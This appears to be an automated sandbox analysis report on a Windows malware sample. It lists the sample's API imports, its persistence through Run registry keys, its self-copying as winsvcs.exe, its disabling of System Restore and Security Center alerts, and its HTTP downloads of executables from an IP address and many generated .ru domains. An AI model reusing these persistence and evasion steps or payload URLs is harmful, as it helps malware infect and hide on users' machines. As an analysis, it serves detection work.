DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 3971618177.exe/atexit
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: winsvcs.exe/atexit
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/isalpha
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/wcsstr
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: msvcrt.dll/isdigit
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/memcpy
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetLogicalDriveStringsW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/GlobalUnlock
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/GlobalLock
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: USER32.dll/OpenClipboard
DynamicLoader: USER32.dll/EmptyClipboard
DynamicLoader: USER32.dll/GetClipboardData
DynamicLoader: USER32.dll/CloseClipboard
DynamicLoader: USER32.dll/SetClipboardData
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegSetValueExW
DynamicLoader: ADVAPI32.dll/RegCreateKeyExA
DynamicLoader: SHELL32.dll/ShellExecuteW
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: 1015321578.exe/atexit
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://92.63.197.48/1.exe
suspicious_request: http://92.63.197.48/2.exe
suspicious_request: http://92.63.197.48/3.exe
suspicious_request: http://92.63.197.48/4.exe
suspicious_request: http://92.63.197.48/5.exe
Performs some HTTP requests
url: http://slpsrgpsrhojifdij.ru/1.exe
url: http://slpsrgpsrhojifdij.ru/2.exe
url: http://slpsrgpsrhojifdij.ru/3.exe
url: http://slpsrgpsrhojifdij.ru/4.exe
url: http://slpsrgpsrhojifdij.ru/5.exe
url: http://92.63.197.48/1.exe
url: http://92.63.197.48/2.exe
url: http://92.63.197.48/3.exe
url: http://92.63.197.48/4.exe
url: http://92.63.197.48/5.exe
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: BdTTBslVE5X4r.exe (2952) called API NtClose 500152 times
Spam: winsvcs.exe (2908) called API NtClose 500152 times
Installs itself for autorun at Windows startup
key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
data: C:\Windows\806084767800850\winsvcs.exe
Creates a hidden or system file
file: C:\Windows\495060393034060
file: C:\Windows\495060393034060\winsvcs.exe
file: C:\Windows\806084767800850
file: C:\Windows\806084767800850\winsvcs.exe
Operates on local firewall's policies and settings
Creates a copy of itself
copy: C:\Windows\495060393034060\winsvcs.exe
Attempts to disable System Restore
Drops a binary and executes it
binary: C:\Windows\806084767800850\winsvcs.exe
binary: C:\Windows\495060393034060\winsvcs.exe
binary: C:\Users\user\AppData\Local\Temp\3971618177.exe
binary: C:\Users\user\AppData\Local\Temp\1015321578.exe
binary: C:\Users\user\AppData\Local\Temp\3895820593.exe
Attempts to modify or disable Security Center warnings

Screenshots


Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]
osheoufhusheoghuesd.ru [VT] NXDOMAIN [VT]
ofheofosugusghuhush.ru [VT]
suieiusiueiuiuushgf.ru [VT]
fuiueufiiehfueghuhf.ru [VT]
sisoefjsuhuhaudhhed.ru [VT]
opllforgirsoofuhohu.ru [VT]
eooeoeooejesfiehfii.ru [VT]
oefosfishiudhiusegf.ru [VT]
aaeiauebfaneifuaeif.ru [VT]
naibfiahdiauehihhre.ru [VT]
auaeuiihaehifhahaud.ru [VT]
oieoaidhhaidhiehheg.ru [VT]
fisiuuiedesubdibesd.ru [VT]
efiiuehdiahiuediaug.ru [VT]
sfiushidhseiugiuseh.ru [VT]
oeiieieisijdingisgf.ru [VT]
aiisiaueuefiuhiehgu.ru [VT]
sfsiuhieghaughaoeho.ru [VT]
hpptlhptdkoodsokdke.ru [VT]
eneebgieeiieieiddrt.ru [VT]
eniaebivaiebifaibef.ru [VT]
mmginsiridnsinnsgir.ru [VT]
gmndaudnahgahghaohh.ru [VT]
aefaidihabevbabifba.ru [VT]
rgijirshisjriijdijh.ru [VT]
aiehazegfageigfzgei.ru [VT]
foaeodheuabguaegubr.ru [VT]
guhaohadueoanavbvbf.ru [VT]
orsodaououaebufbeob.ru [VT]
eaiiakeiohoueghoaur.ru [VT]
naiebiaifzgfaezgdzr.ru [VT]
gaeuhdobaoebuagoaoe.ru [VT]
giuahfoaoeubfouaena.ru [VT]
rgsouhdoauenodaeufb.ru [VT]
eoguaonedonaodabobg.ru [VT]
gouaondoaudbaebobgu.ru [VT]
giohuoaehdoueofbaur.ru [VT]
gnaoedoaoounauubueu.ru [VT]
gbobaebaodebuoueofu.ru [VT]
srgouosehohedohaeoh.ru [VT]
goauhoednoaueouabbe.ru [VT]
gnaednouebaoubefoub.ru [VT]
plpaedjaofheagoahdg.ru [VT]
guaeudueaennnaenuen.ru [VT]
rgoonedoauneuoebuae.ru [VT]

Summary

C:\Users\user\AppData\Local\Temp\msvcr100.dll
C:\Windows\System32\msvcr100.dll
C:\Windows\system\msvcr100.dll
C:\Windows\msvcr100.dll
C:\Windows\System32\wbem\msvcr100.dll
C:\Windows\System32\WindowsPowerShell\v1.0\msvcr100.dll
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
C:\Windows\495060393034060\winsvcs.exe
C:\Windows\495060393034060
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
C:\Windows\495060393034060\msvcr100.dll
C:\Windows\495060393034060\winsvcs.exe:Zone.Identifier
\Device\KsecDD
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\user\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3180725230.exe:Zone.Identifier
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\806084767800850\winsvcs.exe
C:\Windows\806084767800850
C:\Windows\806084767800850\msvcr100.dll
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3971618177.exe
C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3344735343.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1498839355.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
\Device\KsecDD
C:\Windows\SysWOW64\en-US\KERNELBASE.dll.mui
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Windows\495060393034060\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3971618177.exe
C:\Users\user\AppData\Local\Temp\3344735343.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe
C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe:Zone.Identifier
C:\Windows\495060393034060\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3895820593.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3180725230.exe:Zone.Identifier
C:\Windows\806084767800850\winsvcs.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\3971618177.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1015321578.exe:Zone.Identifier
C:\Users\user\AppData\Local\Temp\1498839355.exe:Zone.Identifier
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.Module32FirstW
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.isalpha
msvcrt.dll.__p__fmode
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll._snprintf
msvcrt.dll.wcsstr
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._snwprintf
